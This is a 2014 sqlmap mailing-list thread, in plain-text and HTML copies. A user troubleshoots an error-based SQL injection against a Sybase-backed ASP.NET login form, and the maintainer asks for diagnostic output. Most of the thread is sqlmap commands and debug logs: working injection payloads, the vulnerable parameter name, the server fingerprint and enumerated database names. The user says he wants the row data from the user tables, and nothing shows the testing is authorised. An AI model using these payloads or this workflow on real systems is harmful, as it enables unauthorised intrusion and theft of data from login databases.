--00248c11e82d4ae55704f572e636
Content-Type: text/plain; charset=ISO-8859-1
Sure. The --parse-errors switch doesn't seem to produce anything
additional? I added -v3 just in case.
--
$ python sqlmap.py ... --dbms=sybase --batch --technique=E --threads=8
--fresh-queries -D ENERGY_MASTER --tables --parse-errors -v3
sqlmap/1.0-dev-59d667d - automatic SQL injection and database takeover
tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior
mutual consent is illegal. It is the end user's responsibility to obey all
applicable local, state and federal laws. Developers assume no liability
and are not responsible for any misuse or damage caused by this program
[*] starting at 14:46:47
[14:46:47] [DEBUG] cleaning up configuration parameters
[14:46:47] [DEBUG] setting the HTTP timeout
[14:46:47] [DEBUG] setting the HTTP method to POST
[14:46:47] [DEBUG] creating HTTP requests opener object
[14:46:47] [DEBUG] forcing back-end DBMS to user defined value
[14:46:47] [INFO] testing connection to the target URL
[14:46:47] [DEBUG] declared web page charset 'utf-8'
sqlmap identified the following injection points with a total of 0 HTTP(s)
requests:
---
Place: POST
Parameter: ctl00$ContentPlaceHolder1$SignInEmailAddressTextbox
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING
clause
Payload: ...
Vector: AND [RANDNUM]=CONVERT(INT,(SELECT
'[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))
---
[14:46:47] [INFO] testing Sybase
[14:46:47] [PAYLOAD] ***@gmail.com' AND 6746=CONVERT(INT,(SELECT
CHAR(113)+CHAR(118)+CHAR(104)+CHAR(114)+CHAR(113)+(SELECT (CASE WHEN
(@@transtate=@@transtate) THEN CHAR(49) ELSE CHAR(48)
END))+CHAR(113)+CHAR(116)+CHAR(108)+CHAR(112)+CHAR(113))) AND 'eeea'='eeea
[14:46:48] [WARNING] reflective value(s) found and filtering out
[14:46:48] [DEBUG] performed 1 queries in 0.47 seconds
[14:46:48] [INFO] confirming Sybase
[14:46:48] [PAYLOAD] ***@gmail.com' AND 6332=CONVERT(INT,(SELECT
CHAR(113)+CHAR(118)+CHAR(104)+CHAR(114)+CHAR(113)+(SELECT (CASE WHEN
(suser_id()=suser_id()) THEN CHAR(49) ELSE CHAR(48)
END))+CHAR(113)+CHAR(116)+CHAR(108)+CHAR(112)+CHAR(113))) AND 'lqSO'='lqSO
[14:46:48] [DEBUG] performed 1 queries in 0.45 seconds
[14:46:48] [INFO] the back-end DBMS is Sybase
web server operating system: Windows Vista
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.0
back-end DBMS: Sybase
[14:46:48] [INFO] fetching tables for database: ENERGY_MASTER
[14:46:48] [PAYLOAD] ***@gmail.com' AND 5371=CONVERT(INT,(SELECT
CHAR(113)+CHAR(118)+CHAR(104)+CHAR(114)+CHAR(113)+(SELECT
ISNULL(CONVERT(VARCHAR(4000),COUNT(*)),CHAR(32)) FROM (SELECT name FROM
ENERGY_MASTER..sysobjects WHERE type IN (CHAR(85))) AS
Legi)+CHAR(113)+CHAR(116)+CHAR(108)+CHAR(112)+CHAR(113))) AND 'idET'='idET
[14:46:49] [DEBUG] performed 1 queries in 0.46 seconds
[14:46:49] [WARNING] in case of continuous data retrieval problems you are
advised to try a switch '--no-cast' or switch '--hex'
No tables found
[14:46:49] [INFO] fetched data logged to text files under
'/opt/sqlmap/output/xxx'
[*] shutting down at 14:46:49
--
$ python sqlmap.py ... --dbs
[14:50:13] [INFO] testing Sybase
[14:50:14] [WARNING] reflective value(s) found and filtering out
[14:50:14] [INFO] confirming Sybase
[14:50:14] [INFO] the back-end DBMS is Sybase
web server operating system: Windows Vista
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.0
back-end DBMS: Sybase
[14:50:14] [INFO] fetching database names
[14:50:14] [INFO] retrieved: 13
[14:50:14] [INFO] fetching number of distinct values for column 'nRfs.name'
[14:50:15] [INFO] retrieved: 13
[14:50:15] [INFO] using column 'nRfs.name' as a pivot for retrieving row
data
[14:50:15] [INFO] retrieved: AR1
[14:50:16] [INFO] retrieved: AR10
[14:50:16] [INFO] retrieved: AR100TST
[14:50:17] [INFO] retrieved: AR15
[14:50:17] [INFO] retrieved: AR710
[14:50:18] [INFO] retrieved: AR710TST
[14:50:18] [INFO] retrieved: ENERGY_MASTER
[14:50:19] [INFO] retrieved: master
[14:50:20] [INFO] retrieved: model
[14:50:20] [INFO] retrieved: olympus
[14:50:21] [INFO] retrieved: sybsystemdb
[14:50:21] [INFO] retrieved: sybsystemprocs
[14:50:22] [INFO] retrieved: tempdb
Post by Miroslav StamparHi.
python sqlmap.py ... -D ENERGY --tables --parse-errors
python sqlmap.py ... --dbs
Bye
Post by les paulHi all,
I'm running into trouble with sqlmap against a Sybase db. Here's the
Adaptive Server Enterprise/15.0.3/EBF 17770 ESD#4/P/x86_64/Enterprise
Linux/ase1503/2768/64-bit/FBO/Thu Aug 26 09:54:27 2010
The technique I'm using is error-based through a POST to a vulnerable
.aspx page. I am able to enumerate the master db, but not the user tables,
which are what I want.
$ ./sqlmap.py -u xxx -d "huge_asp_net_viewstate&theparam=blah"
--dbms=sybase --threads=8 --batch --technique=E -D master --tables
This produces 58 tables, mostly sys* and some mon* which seem standard. I
can dump the sysobjects table using -D and -T, etc.
The web app is querying a database we'll call "ENERGY". If I try to "-D
ENERGY --tables", I get "No tables found, try using --hex or --no-cast
blahblah" (which don't work).
I used -v4 to look closely at the requests, and see sqlmap is prefixing
the tablenames with "ENERGY.dbo." or sometimes just "ENERGY..", which after
experimenting I found doesn't work, so I wrote a small tamper script to
strip off "ENERGY.." and "ENERGY.dbo." - this lets me pull the column names
from the user tables (type='U'), but I'm still not able to get at the
actual data/rows in the tables.
I know it must be possible because the web app is definitely querying the
tables to validate a login (this is a sqli vuln in a login form, heh).
I'm not even sure this is really a bug in sqlmap - maybe something odd in
the way the database is built or something. I just thought I'd ask in case
anyone has had success using sqlmap against a similar Sybase db and has
some tips or suggestions.
Thanks for reading - I can provide more information if anyone's
interested.
------------------------------------------------------------------------------
Learn Graph Databases - Download FREE O'Reilly Book
"Graph Databases" is the definitive new guide to graph databases and their
applications. Written by three acclaimed leaders in the field,
this first edition is now available. Download your free book today!
http://p.sf.net/sfu/13534_NeoTech
_______________________________________________
sqlmap-users mailing list
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
--00248c11e82d4ae55704f572e636
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
<div dir="ltr"><div><div>Sure. The --parse-errors switch doesn't seem to produce anything additional? I added -v3 just in case. </div><div><br></div><div>--</div><div>$ python sqlmap.py ... --dbms=sybase --batch --technique=E --threads=8 --fresh-queries -D ENERGY_MASTER --tables --parse-errors -v3</div>
<div><br></div><div> sqlmap/1.0-dev-59d667d - automatic SQL injection and database takeover tool</div><div> <a href="http://sqlmap.org">http://sqlmap.org</a></div><div><br></div><div>[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program</div>
<div><br></div><div>[*] starting at 14:46:47</div><div><br></div><div>[14:46:47] [DEBUG] cleaning up configuration parameters</div><div>[14:46:47] [DEBUG] setting the HTTP timeout</div><div>[14:46:47] [DEBUG] setting the HTTP method to POST</div>
<div>[14:46:47] [DEBUG] creating HTTP requests opener object</div><div>[14:46:47] [DEBUG] forcing back-end DBMS to user defined value</div><div>[14:46:47] [INFO] testing connection to the target URL</div><div>[14:46:47] [DEBUG] declared web page charset 'utf-8'</div>
<div>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:</div><div>---</div><div>Place: POST</div><div>Parameter: ctl00$ContentPlaceHolder1$SignInEmailAddressTextbox</div><div> Type: error-based</div>
<div> Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause</div><div> Payload: ...</div><div> Vector: AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</div>
<div>---</div><div>[14:46:47] [INFO] testing Sybase</div><div>[14:46:47] [PAYLOAD] <a href="mailto:***@gmail.com">***@gmail.com</a>' AND 6746=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(104)+CHAR(114)+CHAR(113)+(SELECT (CASE WHEN (@@transtate=@@transtate) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(116)+CHAR(108)+CHAR(112)+CHAR(113))) AND 'eeea'='eeea</div>
<div>[14:46:48] [WARNING] reflective value(s) found and filtering out</div><div>[14:46:48] [DEBUG] performed 1 queries in 0.47 seconds</div><div>[14:46:48] [INFO] confirming Sybase</div><div>[14:46:48] [PAYLOAD] <a href="mailto:***@gmail.com">***@gmail.com</a>' AND 6332=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(104)+CHAR(114)+CHAR(113)+(SELECT (CASE WHEN (suser_id()=suser_id()) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(116)+CHAR(108)+CHAR(112)+CHAR(113))) AND 'lqSO'='lqSO</div>
<div>[14:46:48] [DEBUG] performed 1 queries in 0.45 seconds</div><div>[14:46:48] [INFO] the back-end DBMS is Sybase</div><div>web server operating system: Windows Vista</div><div>web application technology: <a href="http://ASP.NET">ASP.NET</a> 4.0.30319, <a href="http://ASP.NET">ASP.NET</a>, Microsoft IIS 7.0</div>
<div>back-end DBMS: Sybase</div><div>[14:46:48] [INFO] fetching tables for database: ENERGY_MASTER</div><div>[14:46:48] [PAYLOAD] <a href="mailto:***@gmail.com">***@gmail.com</a>' AND 5371=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(104)+CHAR(114)+CHAR(113)+(SELECT ISNULL(CONVERT(VARCHAR(4000),COUNT(*)),CHAR(32)) FROM (SELECT name FROM ENERGY_MASTER..sysobjects WHERE type IN (CHAR(85))) AS Legi)+CHAR(113)+CHAR(116)+CHAR(108)+CHAR(112)+CHAR(113))) AND 'idET'='idET</div>
<div>[14:46:49] [DEBUG] performed 1 queries in 0.46 seconds</div><div>[14:46:49] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'</div><div>
No tables found</div><div>[14:46:49] [INFO] fetched data logged to text files under '/opt/sqlmap/output/xxx'</div><div><br></div><div>[*] shutting down at 14:46:49</div><div>--</div><div><br></div><div>$ python sqlmap.py ... --dbs</div> <div><br></div><div>[14:50:13] [INFO] testing Sybase</div><div>[14:50:14] [WARNING] reflective value(s) found and filtering out</div><div>[14:50:14] [INFO] confirming Sybase</div><div>[14:50:14] [INFO] the back-end DBMS is Sybase</div> <div>web server operating system: Windows Vista</div><div>web application technology: <a href="http://ASP.NET">ASP.NET</a> 4.0.30319, <a href="http://ASP.NET">ASP.NET</a>, Microsoft IIS 7.0</div><div>back-end DBMS: Sybase</div> <div>[14:50:14] [INFO] fetching database names</div><div>[14:50:14] [INFO] retrieved: 13</div><div>[14:50:14] [INFO] fetching number of distinct values for column 'nRfs.name'</div><div>[14:50:15] [INFO] retrieved: 13</div> <div>[14:50:15] [INFO] using column 'nRfs.name' as a pivot for retrieving row data</div><div>[14:50:15] [INFO] retrieved: AR1</div><div>[14:50:16] [INFO] retrieved: AR10</div><div>[14:50:16] [INFO] retrieved: AR100TST</div> <div>[14:50:17] [INFO] retrieved: AR15</div><div>[14:50:17] [INFO] retrieved: AR710</div><div>[14:50:18] [INFO] retrieved: AR710TST</div><div>[14:50:18] [INFO] retrieved: ENERGY_MASTER</div><div>[14:50:19] [INFO] retrieved: master</div> <div>[14:50:20] [INFO] retrieved: model</div><div>[14:50:20] [INFO] retrieved: olympus</div><div>[14:50:21] [INFO] retrieved: sybsystemdb</div><div>[14:50:21] [INFO] retrieved: sybsystemprocs</div><div>[14:50:22] [INFO] retrieved: tempdb</div> </div><div><br></div><div class="gmail_extra"><br></div><div class="gmail_extra"><br></div><div class="gmail_extra"><div class="gmail_quote">On 25 March 2014 14:22, Miroslav Stampar <span dir="ltr"><<a href="mailto:***@gmail.com" target="_blank">***@gmail.com</a>></span> wrote:<br> <blockquote class="gmail_quote" style="margin:0px 0px 0px 0.8ex;border-left-width:1px;border-left-color:rgb(204,204,204);border-left-style:solid;padding-left:1ex"><p dir="ltr">Hi.</p> <p dir="ltr">Can you please copy/paste the console output you get for sqlmap run with:</p> <p dir="ltr">python sqlmap.py ... -D ENERGY --tables --parse-errors</p> <p dir="ltr">Also, for:</p> <p dir="ltr">python sqlmap.py ... --dbs</p> <p dir="ltr">Bye</p> <div class="gmail_quote"><div><div class="h5">On Mar 25, 2014 7:16 PM, "les paul" <<a href="mailto:***@gmail.com" target="_blank">***@gmail.com</a>> wrote:<br type="attribution"></div></div><blockquote class="gmail_quote" style="margin:0px 0px 0px 0.8ex;border-left-width:1px;border-left-color:rgb(204,204,204);border-left-style:solid;padding-left:1ex">
<div><div class="h5">
<div dir="ltr"><div style="font-family:arial,sans-serif;font-size:13px">Hi all,</div><div style="font-family:arial,sans-serif;font-size:13px"><br></div><div style="font-family:arial,sans-serif;font-size:13px">I'm running into trouble with sqlmap against a Sybase db. Here's the fingerprint:</div>
<div style="font-family:arial,sans-serif;font-size:13px"><br></div><div style="font-family:arial,sans-serif;font-size:13px">Adaptive Server Enterprise/15.0.3/EBF 17770 ESD#4/P/x86_64/Enterprise Linux/ase1503/2768/64-bit/FBO/Thu Aug 26 09:54:27 2010<br>
</div><div style="font-family:arial,sans-serif;font-size:13px"><br></div><div style="font-family:arial,sans-serif;font-size:13px">The technique I'm using is error-based through a POST to a vulnerable .aspx page. I am able to enumerate the master db, but not the user tables, which are what I want.</div>
<div style="font-family:arial,sans-serif;font-size:13px"><br></div><div style="font-family:arial,sans-serif;font-size:13px">$ ./sqlmap.py -u xxx -d "huge_asp_net_viewstate&theparam=blah" --dbms=sybase --threads=8 --batch --technique=E -D master --tables</div>
<div style="font-family:arial,sans-serif;font-size:13px"><br></div><div style="font-family:arial,sans-serif;font-size:13px">This produces 58 tables, mostly sys* and some mon* which seem standard. I can dump the sysobjects table using -D and -T, etc.</div>
<div style="font-family:arial,sans-serif;font-size:13px"><br></div><div style="font-family:arial,sans-serif;font-size:13px">The web app is querying a database we'll call "ENERGY". If I try to "-D ENERGY --tables", I get "No tables found, try using --hex or --no-cast blahblah" (which don't work).</div>
<div style="font-family:arial,sans-serif;font-size:13px"><br></div><div style="font-family:arial,sans-serif;font-size:13px">I used -v4 to look closely at the requests, and see sqlmap is prefixing the tablenames with "ENERGY.dbo." or sometimes just "ENERGY..", which after experimenting I found doesn't work, so I wrote a small tamper script to strip off "ENERGY.." and "ENERGY.dbo." - this lets me pull the column names from the user tables (type='U'), but I'm still not able to get at the actual data/rows in the tables.</div>
<div style="font-family:arial,sans-serif;font-size:13px"><br></div><div style="font-family:arial,sans-serif;font-size:13px">I know it must be possible because the web app is definitely querying the tables to validate a login (this is a sqli vuln in a login form, heh).</div>
<div style="font-family:arial,sans-serif;font-size:13px"><br></div><div style="font-family:arial,sans-serif;font-size:13px">I'm not even sure this is really a bug in sqlmap - maybe something odd in the way the database is built or something. I just thought I'd ask in case anyone has had success using sqlmap against a similar Sybase db and has some tips or suggestions.</div>
<div style="font-family:arial,sans-serif;font-size:13px"><br></div><div style="font-family:arial,sans-serif;font-size:13px">Thanks for reading - I can provide more information if anyone's interested.</div></div>
<br></div></div>------------------------------------------------------------------------------<br>
Learn Graph Databases - Download FREE O'Reilly Book<br>
"Graph Databases" is the definitive new guide to graph databases and their<br>
applications. Written by three acclaimed leaders in the field,<br>
this first edition is now available. Download your free book today!<br>
<a href="http://p.sf.net/sfu/13534_NeoTech" target="_blank">http://p.sf.net/sfu/13534_NeoTech</a><br>_______________________________________________<br>
sqlmap-users mailing list<br>
<a href="mailto:sqlmap-***@lists.sourceforge.net" target="_blank">sqlmap-***@lists.sourceforge.net</a><br>
<a href="https://lists.sourceforge.net/lists/listinfo/sqlmap-users" target="_blank">https://lists.sourceforge.net/lists/listinfo/sqlmap-users</a><br>
<br></blockquote></div>
</blockquote></div><br></div></div>
--00248c11e82d4ae55704f572e636--